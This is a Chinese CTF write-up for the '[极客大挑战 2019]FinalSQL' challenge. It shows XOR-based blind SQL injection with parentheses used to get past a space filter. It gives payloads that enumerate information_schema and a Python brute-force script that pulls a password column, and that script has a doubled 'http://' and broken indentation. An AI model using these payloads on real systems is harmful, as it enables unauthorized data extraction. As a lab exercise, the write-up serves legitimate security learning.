当前位置:   article > 正文

[极客大挑战 2019]FinalSQL_sql wed极客大挑战

sql wed极客大挑战

题目
图片.png
过程
1.提示盲注,找注入口,fuzz看过滤情况,使用bp自带的字典即可。
图片.png
2.’^‘没有被过滤,输入1^1回显’ERROR’,1^0回显’NO! Not this! Click others~~~’,判断出为数字型注入
图片.png
由于空格被过滤,用()代替。

1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema
ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称

1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)
where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j)) 获取数据库表名

1^(ord(substr((select(group_concat(column_name))from(information_schema.column
s)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
获取数据库列名
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

最终payload

import requests
url = "http://http://5b8979b2-48a2-452e-bb0d-77a4a0e25db9.node3.buuoj.cn/search.php"
for i in range(1,20):
    for j in range(1,128):           d="?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),'"+str(i)+"',1))='"+str(j)+"')^1"
        r = requests.get(url+d)
        if 'Click' in r.text:
            print(chr(j))
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号